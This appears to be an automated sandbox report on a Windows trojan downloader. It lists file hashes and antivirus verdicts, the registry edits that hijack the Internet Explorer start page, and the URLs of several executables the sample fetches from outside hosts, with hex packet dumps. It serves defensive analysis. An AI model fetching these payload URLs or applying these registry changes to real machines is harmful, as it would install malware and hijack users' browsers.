Analysis Date2015-01-11 06:44:35
MD598168e93abfb6365eb23ef9758023ef3
SHA1a17274ad3a3e0ea154b3d0c50f48d45e5fd30f10

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionCODE md5: 77c96ef7bdcff6ec4f8d7bc18481cf03 sha1: 9094cbb4df2022c01c9c9987060ffcfdf22d470c size: 105984
SectionDATA md5: 9a79009c4d1a3359e33c4a9bc594a62d sha1: 92a309020393874f71c658e740043841cd527db4 size: 2048
SectionBSS md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.idata md5: dd862bec67f845131693f41fcc06db65 sha1: 116edb830346ba5578e6e8b3180b267924548f4a size: 3584
Section.tls md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.rdata md5: 617757b6d8d7cf63d3e3f3aa93088b4e sha1: c0cec09fcb6a7cb6cbd525ad093b8c8d97a40dd4 size: 512
Section.reloc md5: 20903aa4c4a4aee94c49cc773d0641d3 sha1: ea913a81f7030129addc585e46ff96649fa58a7d size: 7680
Section.rsrc md5: 5f4bd9ea52af105ac012f504cffbf250 sha1: 90daf097b1727d8bd1a625c4ad0c4cd60036afde size: 19456
Timestamp1992-06-19 22:22:17
PackerBorland Delphi 4.0
PEhashd58df2542f2bdbc4041769cdbf5ba06451d81349
IMPhash7a490964f2517120d5f47e2c64fc493a
AV360 Safeno_virus
AVAd-AwareGen:Trojan.Heur.iGW@yPchQGlbj
AVAlwil (avast)no_virus
AVArcabit (arcavir)Gen:Trojan.Heur.iGW@yPchQGlbj
AVAuthentiumW32/Delfloader.B.gen!Eldorado
AVAvira (antivir)TR/ATRAPS.Gen
AVBullGuardGen:Trojan.Heur.iGW@yPchQGlbj
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. WebDLOADER.Trojan
AVEmsisoftGen:Trojan.Heur.iGW@yPchQGlbj
AVEset (nod32)Win32/StartPage.OOT
AVFortinetW32/StartPage.OOT!tr
AVFrisk (f-prot)W32/Delfloader.B.gen!Eldorado
AVF-SecureGen:Trojan.Heur.iGW@yPchQGlbj
AVGrisoft (avg)Downloader.Rozena
AVIkarusno_virus
AVK7Trojan ( 7000000f1 )
AVKasperskyTrojan-Downloader.Win32.Generic
AVMalwareBytesTrojan.Downloader
AVMcafeeno_virus
AVMicrosoft Security EssentialsTrojan:Win32/Beaugrit.gen!AAA
AVMicroWorld (escan)Gen:Trojan.Heur.iGW@yPchQGlbj
AVRisingno_virus
AVSophosMal/DelpDldr-F
AVSymantecTrojan.Gen
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\ ➝
"C:\Program Files\Internet Explorer\iexplore.exe" http://www.9365.info\\x00
RegistryHKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\ ➝
"C:\Program Files\Internet Explorer\iexplore.exe" http://www.9365.info\\x00
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet explorer\Main\Start Page ➝
http://www.9365.info\\x00
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\rksjudy.bat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Creates ProcessC:\rksjudy.bat
Creates Mutexrksjudyrksjudyb
Winsock DNSsoft.doyo.cn
Winsock DNS114.215.104.141
Winsock DNSdown.xiaoxinrili.com
Winsock DNSdls.oss-cn-hangzhou.aliyuncs.com
Winsock DNSclient-b.jtdichan.com
Winsock URLhttp://dls.oss-cn-hangzhou.aliyuncs.com/cyiesetup.exe
Winsock URLhttp://client-b.jtdichan.com/packages/g_wz/default2/a-zm-157391-v5.exe
Winsock URLhttp://114.215.104.141/hzsoft/setup_2949-14598.exe
Winsock URLhttp://soft.doyo.cn/soft/dy46883223658.exe
Winsock URLhttp://down.xiaoxinrili.com/hezi/jm/setup_t10303.exe
Winsock URLhttp://dls.oss-cn-hangzhou.aliyuncs.com/setup_2949-14598.exe

Process
↳ C:\rksjudy.bat

Network Details:

DNSdls.oss-cn-hangzhou.aliyuncs.com
Type: A
112.124.219.90
DNSclient-b.jtdichan.com
Type: A
61.147.97.229
DNS360.band.glb0.ldcache.net
Type: A
183.61.19.168
DNS360.band.glb0.ldcache.net
Type: A
202.97.174.82
DNStf01.dlmix.glb0.lxdns.com
Type: A
8.37.235.11
DNStf01.dlmix.glb0.lxdns.com
Type: A
8.37.235.12
DNStf01.dlmix.glb0.lxdns.com
Type: A
8.37.234.9
DNStf01.dlmix.glb0.lxdns.com
Type: A
8.37.234.10
DNStf01.dlmix.glb0.lxdns.com
Type: A
8.37.234.11
DNStf01.dlmix.glb0.lxdns.com
Type: A
8.37.234.12
DNStf01.dlmix.glb0.lxdns.com
Type: A
8.37.235.9
DNStf01.dlmix.glb0.lxdns.com
Type: A
8.37.235.10
DNSdown.xiaoxinrili.com
Type: A
DNSsoft.doyo.cn
Type: A
HTTP GEThttp://dls.oss-cn-hangzhou.aliyuncs.com/setup_2949-14598.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://114.215.104.141/hzsoft/setup_2949-14598.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://dls.oss-cn-hangzhou.aliyuncs.com/setup_2949-14598.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://client-b.jtdichan.com/packages/g_wz/default2/a-zm-157391-v5.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://client-b.jtdichan.com/packages/g_wz/default2/a-zm-157391-v5.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://client-b.jtdichan.com/packages/g_wz/default2/a-zm-157391-v5.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://dls.oss-cn-hangzhou.aliyuncs.com/cyiesetup.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://dls.oss-cn-hangzhou.aliyuncs.com/cyiesetup.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://dls.oss-cn-hangzhou.aliyuncs.com/cyiesetup.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://down.xiaoxinrili.com/hezi/jm/setup_t10303.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://down.xiaoxinrili.com/hezi/jm/setup_t10303.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://down.xiaoxinrili.com/hezi/jm/setup_t10303.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://soft.doyo.cn/soft/dy46883223658.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://soft.doyo.cn/soft/dy46883223658.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://soft.doyo.cn/soft/dy46883223658.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 112.124.219.90:80
Flows TCP192.168.1.1:1033 ➝ 114.215.104.141:80
Flows TCP192.168.1.1:1034 ➝ 112.124.219.90:80
Flows TCP192.168.1.1:1035 ➝ 61.147.97.229:80
Flows TCP192.168.1.1:1036 ➝ 61.147.97.229:80
Flows TCP192.168.1.1:1037 ➝ 61.147.97.229:80
Flows TCP192.168.1.1:1038 ➝ 112.124.219.90:80
Flows TCP192.168.1.1:1039 ➝ 112.124.219.90:80
Flows TCP192.168.1.1:1040 ➝ 112.124.219.90:80
Flows TCP192.168.1.1:1041 ➝ 183.61.19.168:80
Flows TCP192.168.1.1:1042 ➝ 183.61.19.168:80
Flows TCP192.168.1.1:1043 ➝ 183.61.19.168:80
Flows TCP192.168.1.1:1044 ➝ 8.37.235.11:80
Flows TCP192.168.1.1:1045 ➝ 8.37.235.11:80
Flows TCP192.168.1.1:1046 ➝ 8.37.235.11:80

Raw Pcap
0x00000000 (00000)   47455420 2f736574 75705f32 3934392d   GET /setup_2949-
0x00000010 (00016)   31343539 382e6578 65204854 54502f31   14598.exe HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   646c732e 6f73732d 636e2d68 616e677a   dls.oss-cn-hangz
0x000000c0 (00192)   686f752e 616c6979 756e6373 2e636f6d   hou.aliyuncs.com
0x000000d0 (00208)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x000000e0 (00224)   65702d41 6c697665 0d0a0d0a            ep-Alive....

0x00000000 (00000)   47455420 2f687a73 6f66742f 73657475   GET /hzsoft/setu
0x00000010 (00016)   705f3239 34392d31 34353938 2e657865   p_2949-14598.exe
0x00000020 (00032)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000030 (00048)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x00000040 (00064)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x00000050 (00080)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x00000060 (00096)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000070 (00112)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000080 (00128)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000090 (00144)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x000000a0 (00160)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x000000b0 (00176)   0a486f73 743a2031 31342e32 31352e31   .Host: 114.215.1
0x000000c0 (00192)   30342e31 34310d0a 436f6e6e 65637469   04.141..Connecti
0x000000d0 (00208)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000e0 (00224)   0d0a2d41 6c697665 0d0a0d0a            ..-Alive....

0x00000000 (00000)   47455420 2f736574 75705f32 3934392d   GET /setup_2949-
0x00000010 (00016)   31343539 382e6578 65204854 54502f31   14598.exe HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   646c732e 6f73732d 636e2d68 616e677a   dls.oss-cn-hangz
0x000000c0 (00192)   686f752e 616c6979 756e6373 2e636f6d   hou.aliyuncs.com
0x000000d0 (00208)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x000000e0 (00224)   65702d41 6c697665 0d0a0d0a            ep-Alive....

0x00000000 (00000)   47455420 2f706163 6b616765 732f675f   GET /packages/g_
0x00000010 (00016)   777a2f64 65666175 6c74322f 612d7a6d   wz/default2/a-zm
0x00000020 (00032)   2d313537 3339312d 76352e65 78652048   -157391-v5.exe H
0x00000030 (00048)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000040 (00064)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000050 (00080)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000060 (00096)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000070 (00112)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000080 (00128)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000090 (00144)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x000000a0 (00160)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x000000b0 (00176)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000c0 (00192)   6f73743a 20636c69 656e742d 622e6a74   ost: client-b.jt
0x000000d0 (00208)   64696368 616e2e63 6f6d0d0a 436f6e6e   dichan.com..Conn
0x000000e0 (00224)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000f0 (00240)   76650d0a 0d0a                         ve....

0x00000000 (00000)   47455420 2f706163 6b616765 732f675f   GET /packages/g_
0x00000010 (00016)   777a2f64 65666175 6c74322f 612d7a6d   wz/default2/a-zm
0x00000020 (00032)   2d313537 3339312d 76352e65 78652048   -157391-v5.exe H
0x00000030 (00048)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000040 (00064)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000050 (00080)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000060 (00096)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000070 (00112)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000080 (00128)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000090 (00144)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x000000a0 (00160)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x000000b0 (00176)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000c0 (00192)   6f73743a 20636c69 656e742d 622e6a74   ost: client-b.jt
0x000000d0 (00208)   64696368 616e2e63 6f6d0d0a 436f6e6e   dichan.com..Conn
0x000000e0 (00224)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000f0 (00240)   76650d0a 0d0a                         ve....

0x00000000 (00000)   47455420 2f706163 6b616765 732f675f   GET /packages/g_
0x00000010 (00016)   777a2f64 65666175 6c74322f 612d7a6d   wz/default2/a-zm
0x00000020 (00032)   2d313537 3339312d 76352e65 78652048   -157391-v5.exe H
0x00000030 (00048)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000040 (00064)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000050 (00080)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000060 (00096)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000070 (00112)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000080 (00128)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000090 (00144)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x000000a0 (00160)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x000000b0 (00176)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000c0 (00192)   6f73743a 20636c69 656e742d 622e6a74   ost: client-b.jt
0x000000d0 (00208)   64696368 616e2e63 6f6d0d0a 436f6e6e   dichan.com..Conn
0x000000e0 (00224)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000f0 (00240)   76650d0a 0d0a                         ve....

0x00000000 (00000)   47455420 2f637969 65736574 75702e65   GET /cyiesetup.e
0x00000010 (00016)   78652048 5454502f 312e310d 0a416363   xe HTTP/1.1..Acc
0x00000020 (00032)   6570743a 202a2f2a 0d0a4163 63657074   ept: */*..Accept
0x00000030 (00048)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x00000040 (00064)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x00000050 (00080)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000060 (00096)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000070 (00112)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000080 (00128)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x00000090 (00144)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000a0 (00160)   290d0a48 6f73743a 20646c73 2e6f7373   )..Host: dls.oss
0x000000b0 (00176)   2d636e2d 68616e67 7a686f75 2e616c69   -cn-hangzhou.ali
0x000000c0 (00192)   79756e63 732e636f 6d0d0a43 6f6e6e65   yuncs.com..Conne
0x000000d0 (00208)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000e0 (00224)   650d0a0d 0a6e3a20 4b656570 2d416c69   e....n: Keep-Ali
0x000000f0 (00240)   76650d0a 0d0a                         ve....

0x00000000 (00000)   47455420 2f637969 65736574 75702e65   GET /cyiesetup.e
0x00000010 (00016)   78652048 5454502f 312e310d 0a416363   xe HTTP/1.1..Acc
0x00000020 (00032)   6570743a 202a2f2a 0d0a4163 63657074   ept: */*..Accept
0x00000030 (00048)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x00000040 (00064)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x00000050 (00080)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000060 (00096)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000070 (00112)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000080 (00128)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x00000090 (00144)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000a0 (00160)   290d0a48 6f73743a 20646c73 2e6f7373   )..Host: dls.oss
0x000000b0 (00176)   2d636e2d 68616e67 7a686f75 2e616c69   -cn-hangzhou.ali
0x000000c0 (00192)   79756e63 732e636f 6d0d0a43 6f6e6e65   yuncs.com..Conne
0x000000d0 (00208)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000e0 (00224)   650d0a0d 0a6e3a20 4b656570 2d416c69   e....n: Keep-Ali
0x000000f0 (00240)   76650d0a 0d0a                         ve....

0x00000000 (00000)   47455420 2f637969 65736574 75702e65   GET /cyiesetup.e
0x00000010 (00016)   78652048 5454502f 312e310d 0a416363   xe HTTP/1.1..Acc
0x00000020 (00032)   6570743a 202a2f2a 0d0a4163 63657074   ept: */*..Accept
0x00000030 (00048)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x00000040 (00064)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x00000050 (00080)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000060 (00096)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000070 (00112)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000080 (00128)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x00000090 (00144)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000a0 (00160)   290d0a48 6f73743a 20646c73 2e6f7373   )..Host: dls.oss
0x000000b0 (00176)   2d636e2d 68616e67 7a686f75 2e616c69   -cn-hangzhou.ali
0x000000c0 (00192)   79756e63 732e636f 6d0d0a43 6f6e6e65   yuncs.com..Conne
0x000000d0 (00208)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000e0 (00224)   650d0a0d 0a6e3a20 4b656570 2d416c69   e....n: Keep-Ali
0x000000f0 (00240)   76650d0a 0d0a                         ve....

0x00000000 (00000)   47455420 2f68657a 692f6a6d 2f736574   GET /hezi/jm/set
0x00000010 (00016)   75705f74 31303330 332e6578 65204854   up_t10303.exe HT
0x00000020 (00032)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000030 (00048)   2a2f2a0d 0a416363 6570742d 456e636f   */*..Accept-Enco
0x00000040 (00064)   64696e67 3a20677a 69702c20 6465666c   ding: gzip, defl
0x00000050 (00080)   6174650d 0a557365 722d4167 656e743a   ate..User-Agent:
0x00000060 (00096)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000070 (00112)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000080 (00128)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000090 (00144)   2e313b20 5356313b 202e4e45 5420434c   .1; SV1; .NET CL
0x000000a0 (00160)   5220322e 302e3530 37323729 0d0a486f   R 2.0.50727)..Ho
0x000000b0 (00176)   73743a20 646f776e 2e786961 6f78696e   st: down.xiaoxin
0x000000c0 (00192)   72696c69 2e636f6d 0d0a436f 6e6e6563   rili.com..Connec
0x000000d0 (00208)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000e0 (00224)   0d0a0d0a 0a6e3a20 4b656570 2d416c69   .....n: Keep-Ali
0x000000f0 (00240)   76650d0a 0d0a                         ve....

0x00000000 (00000)   47455420 2f68657a 692f6a6d 2f736574   GET /hezi/jm/set
0x00000010 (00016)   75705f74 31303330 332e6578 65204854   up_t10303.exe HT
0x00000020 (00032)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000030 (00048)   2a2f2a0d 0a416363 6570742d 456e636f   */*..Accept-Enco
0x00000040 (00064)   64696e67 3a20677a 69702c20 6465666c   ding: gzip, defl
0x00000050 (00080)   6174650d 0a557365 722d4167 656e743a   ate..User-Agent:
0x00000060 (00096)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000070 (00112)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000080 (00128)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000090 (00144)   2e313b20 5356313b 202e4e45 5420434c   .1; SV1; .NET CL
0x000000a0 (00160)   5220322e 302e3530 37323729 0d0a486f   R 2.0.50727)..Ho
0x000000b0 (00176)   73743a20 646f776e 2e786961 6f78696e   st: down.xiaoxin
0x000000c0 (00192)   72696c69 2e636f6d 0d0a436f 6e6e6563   rili.com..Connec
0x000000d0 (00208)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000e0 (00224)   0d0a0d0a 0a6e3a20 4b656570 2d416c69   .....n: Keep-Ali
0x000000f0 (00240)   76650d0a 0d0a                         ve....

0x00000000 (00000)   47455420 2f68657a 692f6a6d 2f736574   GET /hezi/jm/set
0x00000010 (00016)   75705f74 31303330 332e6578 65204854   up_t10303.exe HT
0x00000020 (00032)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000030 (00048)   2a2f2a0d 0a416363 6570742d 456e636f   */*..Accept-Enco
0x00000040 (00064)   64696e67 3a20677a 69702c20 6465666c   ding: gzip, defl
0x00000050 (00080)   6174650d 0a557365 722d4167 656e743a   ate..User-Agent:
0x00000060 (00096)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000070 (00112)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000080 (00128)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000090 (00144)   2e313b20 5356313b 202e4e45 5420434c   .1; SV1; .NET CL
0x000000a0 (00160)   5220322e 302e3530 37323729 0d0a486f   R 2.0.50727)..Ho
0x000000b0 (00176)   73743a20 646f776e 2e786961 6f78696e   st: down.xiaoxin
0x000000c0 (00192)   72696c69 2e636f6d 0d0a436f 6e6e6563   rili.com..Connec
0x000000d0 (00208)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000e0 (00224)   0d0a0d0a 0a6e3a20 4b656570 2d416c69   .....n: Keep-Ali
0x000000f0 (00240)   76650d0a 0d0a                         ve....

0x00000000 (00000)   47455420 2f736f66 742f6479 34363838   GET /soft/dy4688
0x00000010 (00016)   33323233 3635382e 65786520 48545450   3223658.exe HTTP
0x00000020 (00032)   2f312e31 0d0a4163 63657074 3a202a2f   /1.1..Accept: */
0x00000030 (00048)   2a0d0a41 63636570 742d456e 636f6469   *..Accept-Encodi
0x00000040 (00064)   6e673a20 677a6970 2c206465 666c6174   ng: gzip, deflat
0x00000050 (00080)   650d0a55 7365722d 4167656e 743a204d   e..User-Agent: M
0x00000060 (00096)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000070 (00112)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000080 (00128)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x00000090 (00144)   3b205356 313b202e 4e455420 434c5220   ; SV1; .NET CLR 
0x000000a0 (00160)   322e302e 35303732 37290d0a 486f7374   2.0.50727)..Host
0x000000b0 (00176)   3a20736f 66742e64 6f796f2e 636e0d0a   : soft.doyo.cn..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a2d41 6c697665   -Alive....-Alive
0x000000e0 (00224)   0d0a0d0a 0a6e3a20 4b656570 2d416c69   .....n: Keep-Ali
0x000000f0 (00240)   76650d0a 0d0a                         ve....

0x00000000 (00000)   47455420 2f736f66 742f6479 34363838   GET /soft/dy4688
0x00000010 (00016)   33323233 3635382e 65786520 48545450   3223658.exe HTTP
0x00000020 (00032)   2f312e31 0d0a4163 63657074 3a202a2f   /1.1..Accept: */
0x00000030 (00048)   2a0d0a41 63636570 742d456e 636f6469   *..Accept-Encodi
0x00000040 (00064)   6e673a20 677a6970 2c206465 666c6174   ng: gzip, deflat
0x00000050 (00080)   650d0a55 7365722d 4167656e 743a204d   e..User-Agent: M
0x00000060 (00096)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000070 (00112)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000080 (00128)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x00000090 (00144)   3b205356 313b202e 4e455420 434c5220   ; SV1; .NET CLR 
0x000000a0 (00160)   322e302e 35303732 37290d0a 486f7374   2.0.50727)..Host
0x000000b0 (00176)   3a20736f 66742e64 6f796f2e 636e0d0a   : soft.doyo.cn..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a2d41 6c697665   -Alive....-Alive
0x000000e0 (00224)   0d0a0d0a 0a6e3a20 4b656570 2d416c69   .....n: Keep-Ali
0x000000f0 (00240)   76650d0a 0d0a                         ve....

0x00000000 (00000)   47455420 2f736f66 742f6479 34363838   GET /soft/dy4688
0x00000010 (00016)   33323233 3635382e 65786520 48545450   3223658.exe HTTP
0x00000020 (00032)   2f312e31 0d0a4163 63657074 3a202a2f   /1.1..Accept: */
0x00000030 (00048)   2a0d0a41 63636570 742d456e 636f6469   *..Accept-Encodi
0x00000040 (00064)   6e673a20 677a6970 2c206465 666c6174   ng: gzip, deflat
0x00000050 (00080)   650d0a55 7365722d 4167656e 743a204d   e..User-Agent: M
0x00000060 (00096)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000070 (00112)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000080 (00128)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x00000090 (00144)   3b205356 313b202e 4e455420 434c5220   ; SV1; .NET CLR 
0x000000a0 (00160)   322e302e 35303732 37290d0a 486f7374   2.0.50727)..Host
0x000000b0 (00176)   3a20736f 66742e64 6f796f2e 636e0d0a   : soft.doyo.cn..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
